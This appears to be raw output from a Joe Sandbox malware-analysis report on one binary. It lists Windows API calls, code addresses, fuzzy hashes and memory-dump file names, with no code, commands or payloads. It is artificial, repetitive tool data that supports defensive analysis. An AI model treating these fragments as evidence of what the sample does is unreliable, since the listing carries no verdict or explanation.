                                                                                                    • Opcode ID: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                                                                                                    • Instruction ID: 2b8ec10df840b18c6e83db769abb81dbdb34fc9aafcc9a411c4e5b9fd1bfb3e8
                                                                                                    • Opcode Fuzzy Hash: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                                                                                                    • Instruction Fuzzy Hash: 1C519FB1E00649AFDB11CFA8E845AEEBBF9EF09300F14411BE556E7391D6309A81CB61
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00AC2D4B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00AC2D53
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00AC2DE1
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC2E0C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00AC2E61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                                                                                                    • Instruction ID: dc9e79ef6517f70d5ea39cc0ba616b5d3837b77291360a4ea2becd64bb11cf96
                                                                                                    • Opcode Fuzzy Hash: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                                                                                                    • Instruction Fuzzy Hash: F441B034A00209ABCF10DF68C845FAEBBB5BF44324F168159E815AB392DB31AA01CBD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                                                                                                      • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B21112
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21121
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B211C9
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00B211F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 2675159561-0
                                                                                                    • Opcode ID: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                                                                                                    • Instruction ID: f22154e089e2441bfb80bae9ceb0df126cf21d90890ab901377dadaf6938e24d
                                                                                                    • Opcode Fuzzy Hash: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                                                                                                    • Instruction Fuzzy Hash: 07410931600214AFDB109F58D885BAEBBE9FF45325F148599FD09AB291C770EE41CBE1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                                                                                                      • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00B0CF45
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B0CF7F
                                                                                                    • _wcslen.LIBCMT ref: 00B0D005
                                                                                                    • _wcslen.LIBCMT ref: 00B0D01B
                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00B0D061
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                    • Opcode ID: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                                                                                                    • Instruction ID: 2eb46657a5b075a1b86ea6c79e2f578db0dfb1cb7d70543c583ca6bdbcd1636c
                                                                                                    • Opcode Fuzzy Hash: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                                                                                                    • Instruction Fuzzy Hash: 824117719452195EDF12EFA4D981EDE7BF9EF48380F1001E6E509E7181EF34A648CB51
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B32E1C
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E4F
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E84
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B32EB6
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B32EE0
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32EF1
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B32F0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178440468-0
                                                                                                    • Opcode ID: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                                                                                                    • Instruction ID: 2581fe25b7047acc6174c5a1830cae6b1d7fff54fe3ebc7754d14c6b8d4b31cd
                                                                                                    • Opcode Fuzzy Hash: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                                                                                                    • Instruction Fuzzy Hash: 90310635604260AFDB21CF5CDC86F6937E1FB9A710F2501A4FA049F2B1CB71A881DB51
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07769
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B0778F
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B07792
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B077B0
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B077B9
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B077DE
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B077EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761583154-0
                                                                                                    • Opcode ID: f116e24311831d460bb77153130cf11af2c73da24d911fc6afe3078b84297c30
                                                                                                    • Instruction ID: e1ee94b5cd6d62ac54b22666b727b3544ad21a77defc5bfd6fe930f82ec2d9c3
                                                                                                    • Opcode Fuzzy Hash: f116e24311831d460bb77153130cf11af2c73da24d911fc6afe3078b84297c30
                                                                                                    • Instruction Fuzzy Hash: 5F218376A04219BFDB10DFA8CC88CBB7BECEB097A47148065B915DB291DA70ED418764
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07842
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07868
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B0786B
                                                                                                    • SysAllocString.OLEAUT32 ref: 00B0788C
                                                                                                    • SysFreeString.OLEAUT32 ref: 00B07895
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B078AF
                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B078BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                    • String ID:
                                                                                                    • API String ID: 3761583154-0
                                                                                                    • Opcode ID: 2f8dee17204633cdcf2d61c8d579cbb8b5f9575e79154050aeef19d14ac3e0e8
                                                                                                    • Instruction ID: d4cb4d906aebef2989e1bdbbbd14f62de7d0527941d9aeb639d8984c5e1e9735
                                                                                                    • Opcode Fuzzy Hash: 2f8dee17204633cdcf2d61c8d579cbb8b5f9575e79154050aeef19d14ac3e0e8
                                                                                                    • Instruction Fuzzy Hash: C9215132A04204BFDB109BE9DC8CDAABBECEB097607148165B915DB2E1DE74EC41CB64
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00B104F2
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B1052E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                                                                                                    • Instruction ID: 28bbe475bfe018928c521f9be3ce876a7ba0b7cd50919df4fa4da1748b3a38e4
                                                                                                    • Opcode Fuzzy Hash: 94516c7d4058a557f031af2dafe14861512c886bb1caf7d70e9c2cc70c6c301d
                                                                                                    • Instruction Fuzzy Hash: FE218071510305ABDB20AF69DC84ADA7BF5EF54724F604A59F8A1E72E0D7B099D0CF20
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B10601
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                                                                                                    • Instruction ID: acb0116e48c4b6fa42156901fd379b7a24542cb530fe3dad6c3393a755c437a4
                                                                                                    • Opcode Fuzzy Hash: 8974804eed330a16c4a027634ddadffe1c6ea33d77ec066de09d41cfac87aa62
                                                                                                    • Instruction Fuzzy Hash: 50219575510305ABDB20AF69DC44ADA77E4FF95720F600A59F8A1E72E0DBF098E0CB10
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                                                                                                      • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                                                                                                      • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B34112
                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B3411F
                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B3412A
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B34139
                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B34145
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                    • String ID: Msctls_Progress32
                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                    • Opcode ID: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                                                                                                    • Instruction ID: bf5380878b7b8f66134577ee5030cb3c1583f8c7d5b68cc2d8e9cd5e7f8274e7
                                                                                                    • Opcode Fuzzy Hash: 55e899c20be77a1795033164afee10e6954bd9579d8e61cb8b196d1bd202b491
                                                                                                    • Instruction Fuzzy Hash: 2A11B2B2140219BEEF118F64CC86EE77FADEF08798F114111FA18A6090CB729C61DBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00ADD7A3: _free.LIBCMT ref: 00ADD7CC
                                                                                                    • _free.LIBCMT ref: 00ADD82D
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00ADD838
                                                                                                    • _free.LIBCMT ref: 00ADD843
                                                                                                    • _free.LIBCMT ref: 00ADD897
                                                                                                    • _free.LIBCMT ref: 00ADD8A2
                                                                                                    • _free.LIBCMT ref: 00ADD8AD
                                                                                                    • _free.LIBCMT ref: 00ADD8B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                    • Instruction ID: 6cdbb734768161fba9956c197a71fd4a872b6a437e7ebc21e0cb0afb545d4a52
                                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                    • Instruction Fuzzy Hash: 3B115E71540B04AAD621BFB0CE47FCB7BDCAF50700F400826B29FAA292DA65B6059760
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B0DA74
                                                                                                    • LoadStringW.USER32(00000000), ref: 00B0DA7B
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0DA91
                                                                                                    • LoadStringW.USER32(00000000), ref: 00B0DA98
                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0DADC
                                                                                                    Strings
                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00B0DAB9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                    • Opcode ID: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                                                                                                    • Instruction ID: dd15663cbec18de05e87314898cfb7a2af0159120ca8b8f1f3faf029ffe4c9c3
                                                                                                    • Opcode Fuzzy Hash: ecfeb51361ddf560d236dd99db0a42c5c2c0c3f1f55ad78048124850a3ef6c88
                                                                                                    • Instruction Fuzzy Hash: BA014FF25002087BE7509BE09D89EEA3AACE708701F500495B706F3081EA749E844B74
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(015BE8E0,015BE8E0), ref: 00B1097B
                                                                                                    • EnterCriticalSection.KERNEL32(015BE8C0,00000000), ref: 00B1098D
                                                                                                    • TerminateThread.KERNEL32(015BE8D8,000001F6), ref: 00B1099B
                                                                                                    • WaitForSingleObject.KERNEL32(015BE8D8,000003E8), ref: 00B109A9
                                                                                                    • CloseHandle.KERNEL32(015BE8D8), ref: 00B109B8
                                                                                                    • InterlockedExchange.KERNEL32(015BE8E0,000001F6), ref: 00B109C8
                                                                                                    • LeaveCriticalSection.KERNEL32(015BE8C0), ref: 00B109CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3495660284-0
                                                                                                    • Opcode ID: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                                                                                                    • Instruction ID: 18e4c394be1e0fc8fde32a8d461b1e2de032b5fccb07ea40e9f8c248817629e8
                                                                                                    • Opcode Fuzzy Hash: 7a2622f824f68ba85b250c1ceec59c0d8c102958dd885c67a74d5c516ea66651
                                                                                                    • Instruction Fuzzy Hash: 4FF0CD31442912BBD7515B94EE89ADA7A65FF05742FA01015F101A18A1CBB594B5CF90
                                                                                                    APIs
                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B21DC0
                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B21DE1
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00B21DF2
                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00B21EDB
                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00B21E8C
                                                                                                      • Part of subcall function 00B039E8: _strlen.LIBCMT ref: 00B039F2
                                                                                                      • Part of subcall function 00B23224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B1EC0C), ref: 00B23240
                                                                                                    • _strlen.LIBCMT ref: 00B21F35
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                    • String ID:
                                                                                                    • API String ID: 3203458085-0
                                                                                                    • Opcode ID: 6ee2592647ed953498e22d23016b54a7d0f9943973a8e67e836d33e49f38e4b4
                                                                                                    • Instruction ID: aec260a1e091ea434cc1c09a12517254d34599033ee16c512cecb56f695936ed
                                                                                                    • Opcode Fuzzy Hash: 6ee2592647ed953498e22d23016b54a7d0f9943973a8e67e836d33e49f38e4b4
                                                                                                    • Instruction Fuzzy Hash: 1CB1F230604310AFC324DF28D995E6A7BE5EF95318F58899CF45A5B2E2CB31ED42CB91
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00AA5D30
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA5D71
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AA5D99
                                                                                                    • GetClientRect.USER32(?,?), ref: 00AA5ED7
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA5EF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
